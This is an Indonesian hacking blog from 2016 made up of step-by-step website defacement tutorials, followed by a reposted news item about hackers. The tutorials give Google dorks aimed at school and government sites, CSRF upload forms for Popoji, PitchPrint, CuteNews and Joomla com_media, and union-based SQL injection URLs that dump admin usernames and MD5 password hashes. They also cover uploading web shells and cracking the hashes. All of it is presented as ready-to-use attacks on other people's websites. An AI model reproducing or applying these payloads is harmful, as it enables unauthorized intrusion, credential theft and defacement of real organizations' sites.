Jumat, 05 Agustus 2016

Cara Deface CMS POPOJI

Oke Karna popoji lagi bomming :v saya mau buat tutor deface CMS Popoji
Udh langsung no bnyk kecot :v
DORK
inurl:"/detailpost site:sch.id"
Inurl:/detailpost site:.co.id
Powered by Popoji
© popojicms
kreasi kan sendiri njeng :v

Next
Stepp 1

buka site/po-admin lalu klik create aaccount di bawah

 

Stepp 2

isi form data diri anda :'v
Stepp 3 kalo seperti ini sukses lanjut
stepp 4 buka email kalian verif akun
Stepp 4 login akun di site/po-admin kalo sukses kaya d ss eyak

Stepp 5
exploit kan ini po-admin/js/plugins/uploader/upload.php
kalo seperti d ss lanjut
CSRF CODE
 <form method="post" action="target.wew/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>

 stepp 6 next  buka csrf upload shell kalian dalam bentuk jpg ingat JPG bukan PHP
Akses Shell site/po-content/po-upload



Salam 
N00bz Security Squad
PhantomGhost

Kamis, 04 Agustus 2016

Tutorial Deface WP PitchPrint Vulnerable


    

   Hallo Gans skarang admin tamvan ini akan share tutor yg jos . 

Dapatnya sih dari blog teman :D , dan saya coba exploitnya trnyata masih bnyak yg vuln mas .

Tanpa basa basi langsung aja pelajari tutornya di bwah ini .

Dork : "inurl:wp-content/plugins/pitchprint/" ( tanpa tanda kutip bos )

Exploit vulnerability : /wp-content/plugins/pitchprint/uploader/

CSRF :

<form method="POST" action="contoh.com/wp-content/plugins/pitchprint/uploader/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>



     Seperti biasa gunakan dorknya menggunakan search engine (google) :v

klau sudah dapat targetnya contoh

http://semvak.com/wp-content/plugins/pitchprint/

     masukkin exploit vulnerability tadi yg ada di atas cok .

nanti tanda vulnnya kyak gini mas bro .





Klau sudah kyak gitu  mas , sisa upload Shellnya broe , pake CSRF yang tadi ada diatas .



Klau gambarnya kek gitu berarti suksek .

jdi sisa panggil shellnya gampang kyak gini mas contohnya :

http://semvak.com/wp-content/plugins/pitchprint/uploader/files/namashellkau.php



Tarararararararararararararararararar :v , mudah kan bos?


Thanks To : www.sidoarjogetar.com - FrozenBear 404 - PhantomGhost - Sulawesi IT Sec




Rabu, 03 Agustus 2016

Tutorial Deface Dengan SQL Manual


 

    Admin Tamvan Kembali :) .

      Skarang sya bkal nge share "Tutorial Deface Dengan SQL Manual"
Sebenarnya Exploit ini sudah sangat lama yah , cma msih bnyak yg vulnerable sih :D .
Kalau Ndak prcaya langsung cek tutornya selengkapnya di bwah ini Bos .

Dork : "inurl:berita.php?id=" (kembangin lgi biar dapat yg lbih jos :D

Masukkin dulu dorknya di google Bos 8-)

Klau sudah dapat vuln target contoh kek gini .

http://contoh.com/berita_detail.php?id_berita=190

Coba Tambahin string bos kek gini ' nanti klau vuln ada kata" kek gini > Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given i

Berarti itu tandanya vuln Bos .



Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan Bos gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.

Contoh kyak gini

http://contoh.com/berita_detail.php?id=190+order+by+1--  > tdk error :p
http://contoh.com/berita_detail.php?id=190+order+by+2--  > tdk error :p
http://contoh.com/berita_detail.php?id=190+order+by+3--  > tdk error :P
http://contoh.com/berita_detail.php?id=190+order+by+4--  > tdk error :p
http://contoh.com/berita_detail.php?id=190+order+by+5--  > tdk error :p
http://contoh.com/berita_detail.php?id=190+order+by+6--  > tdk error :p ( skip aja dah )
http://contoh.com/berita_detail.php?id=190+order+by+15-- > Nah akhirnya error jg :D



Nah Pada Angka 15 Trnyata Error Bos :D , Jdi yang kita ambil angka yg sebelumnya muncul error , berarti kita ambil angka 14 Bos , angka 14 berarti jumlah DB nya ( database ) .

Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:

http://contoh.com/berita_detail.php?id_=-190+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--


Disini bisa kita lihat bahwa angka yang muncul yaitu 4. angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.


 Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah"version()" atau "@@version".
contoh: 


http://contoh.com/berita_detail.php?id_=-190+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14



Nah bisa kita lihat versi db sql yang di pakai pada website nya v 5.5.50 , jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.


       Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --. Contoh : 

http://contoh.com/berita_detail.php?id=-190+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()--


Nah Akhirnya keliatan table nya : agenda,album,berita,gallery,kategori,member,member2,menu,modul,r_bonus,r_member,reward,tag,user_menu,users . Langkah selanjutnya kita akan mencari username dan password admin pada tabel Users. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel users harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya disini > https://www.easycalculation.com/ascii-hex.php . Kemudian hsil konversi dari table Users adalah 117 115 101 114 115lalu kita masukkan ke CHAR(117, 115, 101, 114, 115) dan pisahkan dengan koma. jadi perintahnya seperti berikut:


http://contoh.com/berita_detail.php?id=-190+union+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=CHAR(117, 115, 101, 114, 115)--



Nah disitu muncul kolom username , password , nama_lengkap , email , dll :D . lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,password)jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah  +from+users-- , users merupakan tabel yang kita dapatkan tadi.

http://contoh.com/berita_detail.php?id=-190+union+select+1,2,3,group_concat(USERNAME,0x3a,PASSWORD),5,6,7,8,9,10,11,12,13,14+from+users--


Taraatataratara . Akhirnya user adminnya keliatan tuh :v , admin:21232f297a57a5a743894a0e4a801fc3,marketing:748423960d692273f277c32e275d459c

 Passwordnya msih bentuk md5 bos jdi klian sendiri yg hash yah :D .

Mudahkan bos? tentu lah klau klian mau belajar bersungguh" hsilnya pasti sangat memuaskan :D .

Thanks To : Mr.3RR0R - PhantomGhost Reborn - Sulawesi IT Sec

Minggu, 03 Juli 2016

Tutorial Deface Dengan SQLI Lokomedia Vulnerable




^_^ Assalamualaikum ^_^

   Maaf Baru Ngepost lagi , Jaringan lelet + udah bosan ngeblog lagi -_- .

Mumpung jringan cepet sekarang saya akan bagikan kepada agan" "Tutorial Deface Dengan SQLI Lokomedia Vulnerable" .

Klau Begitu langsung saja baca yuk . Cekidot :D

Dork : inurl:statis-1-profil.html (kembangin lgi biar dapat bnyak)

exploit vuln : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

Langsung sja gunakan dork diatas menggunakan search engine (google.com) .

Klau sudah dapat Targetnya contoh kyak gini nih Mas Mbah .

www.site.go.id/statis-1-profil.html

Langsung saja masukkan exploit diatas

www.site.go.id/statis-1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html

Nanti username dan password adminnya keliatan tuh di title webnya .

kyak gini .




Kan disitu tdk keliatan jelas passnya klau mau liat fullnya tambahkan "view-source:" Contoh kek gini.


Tuh kan Udah keliata user dan pass adminnya^_^

Tapi passwordnya msih berbentuk md5 -_- terpaksa hrus di hash dulu mas mbah ^_^

Link hash md5 : https://hashkiller.co.uk/md5-decrypter.aspx

Sisa cari saja sendiri halaman loginnya , contoh :

www.site.go.id/adminweb | www.site.go.id/administrator | www.site.go.id/admin | www.site.go.id/redaktur

Ok gitu aja basa basinya om :D

Langsung aja di praktekin :v . Jangan lupa tetap coli di rumah :V

Thanks To : Sec7or Team | Bang Andra | PhantomGhost Team | Sulawesi IT Sec


Selasa, 21 Juni 2016

CuteNews Remote File Upload Vulnerable


   
  ^-^ Assalamualaikum Mas Mba ^-^

Sekarang saya akan share tutorial sederhana ini "CuteNews Remote File Upload Vulnerable"

kenapa sya bilang sederhana krena exploit ini sangat mudah untuk di pahami :D .

Langsung aja baca artikel di bwah ini .

Dork = "powered by cutenews" ( kembangin lgi dorknya yah biar dapat banyak )

Gunakan Dork Diatas Dengan Menggunakan Mesin Pencaharian Google

Klau sudah dapat targetnya , vulnnya kayak gini



Nah disitu ada tulisan register klik disitu , buat mendaftar jadi member :D 

Isi semua kolomnya dengan benar :v . contohnya kyak gini :




Kalau sudah di daftar klik box yg bertuliskan register , nanti klau vuln gambarnya kayak gini .



Klau sudah msuk kayak gini trus ada kolom upload files berarti vuln .

Langsung aja upload shellmu , trus klik box "Save Changes"

Klau berhasil nanti tempat shellnya kyak gini

www.site.com/cutenews/uploads/avatar_mar_namashellmu.php

contoh klau nama shellmu coli.php

www.site.com/cutenews/uploads/avatar_mar_coli.php

Mudahkan :D , Langsung aja praktekin Bos .

^-^ Waasalamualaikum ^-^


Thanks To : Mr.3RR0R | PhantomGhost Team | Sulawesi IT Sec

Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/

Kamis, 09 Juni 2016

Tutorial Deface Dengan Com_Media




      Assalamualaikum mas mbah ^_^

Sekarang lanjut ke tutorial selanjutnya "Tutorial Deface Dengan Com_Media" sebenarnya exploit ini bisa disebut exploit jadul , soalnya ini exploit sudah lama sekali :D .

Tapi exploit nya masih joss kok . masih bnyak yg perawan :D

Langsung aja yah :D .

Dork : "inurl:com_media" (tanpa kutip , kembangin lagi yah itu cuman dork default :) )

Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

   Gunakan dorknya dulu dengan menggunakan mesin pencaharian google :D .





    Pilih salah satu target :D

Klau udah dapat contoh kyak gini .

www.site.com/

   Masukkan exploit yang di atas tadi :D , jadinya nanti kyak gini

www.site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

   Kalau vuln nanti gambarnya kek gini Mas dan Mbah :D





  Tinggal Upload deh file mu :D

Note: file yang bisa diupload berextensi .txt .jpg .gif .png, Untuk html dan php tidak bisa.





Selesai Path Uploadnya Disini > www.site.com/images/file/nama.txt


Gitu aja mudahkan.? , Langsung hjar master dan jgn lupa tetap enjoy :D

Waasalamualaikum ^_^

Thanks To : PhantomGhost - Sulawesi IT Sec

Source Images : https://sulawesi-itsecurity.blogspot.co.id/

Hacker Sejati Meretas Untuk Kesenangan




  Banyak peretas yang menjalankan aksinya untuk merusak sistem sampai mengeruk keuntungan materi. Namun Kaspersky menilai peretas yang menggunakan keahliannya untuk mengeruk uang orang lain bukanlah seorang hacker sejati.

  Dikatakan pihak Kaspersky, hacker atau peretas yang sesungguhnya itu bukan mencari keuntungan. Mereka melakukan aksi peretasan hanya untuk kesenangan pribadi.

  "Hacker yang sebenarnya itu, mereka melakukan hanya untuk kesenangan, bukan untuk mencari kepentingan ekonomi," ujar Territory Channel Manager Kaspersky SEA Indonesia, Dony Koemandarin, ditemui di Ritz Carlton Hotel, Mega Kuningan, Jakarta, Kamis, 26 November 2015.

  Lebih lanjut ia menjelaskan, saat ini banyak peretas bermunculan dan digunakan kemampuannya untuk kejahatan. Itu disebutnya bukan kategori hacker sebenarnya. Hacker, kata dia, melakukan sesuatu didasari‎ karena kesenangan.

  "Berbicara spionase, mata-mata perusahaan, cyber criminal dengan struktur hacker yang teroganisir, itu bukan hacker yang sebenarnya. Dengan di bawah organisasi yang baik, yang ditata dengan rapih cara kerjanya untuk melakukan peretasan‎, itu bukan hacker sesungguhnya," tegasnya.

  Peretas bagi dia itu, seperti kemampuan membobol password, membuat malware yang membuat dia menjadi terkenal, bukan untuk kejahatan dengan tingkat keberlanjutan yang mencari keuntungan semata.

  "‎Kalau ada yang bilang hacker juga manusia, balik lagi siapa yang memegang dia. Kalau direkrut aktivis, dia untuk kesenangan. Hacker itu gak punya tujuan, betul-betul untuk kesenangan. Biasanya, mereka meretas untuk membantu teman-teman dia," ucapnya.


Thanks To : Sulawesi IT Sec

Source : VIVA NEWS & https://sulawesi-itsecurity.blogspot.co.id/